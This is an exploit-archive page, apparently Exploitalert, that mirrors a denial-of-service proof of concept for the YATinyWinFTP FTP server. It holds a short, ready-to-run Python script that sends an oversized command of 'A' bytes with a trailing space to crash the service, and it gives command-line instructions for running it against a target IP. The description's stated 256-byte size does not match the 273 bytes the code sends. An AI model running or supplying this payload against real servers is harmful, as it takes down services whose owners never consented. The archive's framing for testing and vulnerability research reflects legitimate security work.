Advertisement






YATinyWinFTP Denial of Service (PoC)

CVE Category Price Severity
N/A CWE-399 N/A N/A
Author Risk Exploitation Type Date
N/A N/A N/A 2020-11-30
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020110230

Below is a copy:

YATinyWinFTP Denial of Service (PoC)
# Exploit Title: YATinyWinFTP - Denial of Service (PoC)
# Google Dork: None
# Date: 20.08.2020
# Exploit Author: strider
# Vendor Homepage: https://github.com/ik80/YATinyWinFTP
# Software Link: https://github.com/ik80/YATinyWinFTP
# Tested on: Windows 10

------------------------------[Description]---------------------------------

This Eyxploit connects to the FTP-Service and sends a command which has a size of 256bytes with an trailing space at the end.
The result it crashes

 -----------------------------[Exploit]---------------------------------------------

#!/usr/bin/env python3
# -*- coding:utf-8 -*-

import socket, sys

target = (sys.argv[1], int(sys.argv[2]))
buffer = b'A' * 272 + b'\x20'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(target)
print(s.recv(1024))
s.send(buffer)
s.close()

 -----------------------------[how to run]-----------------------------

C:\> TinyWinFTP.exe servepath port

~$ python3 exploit.py targetip port

Boom!

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum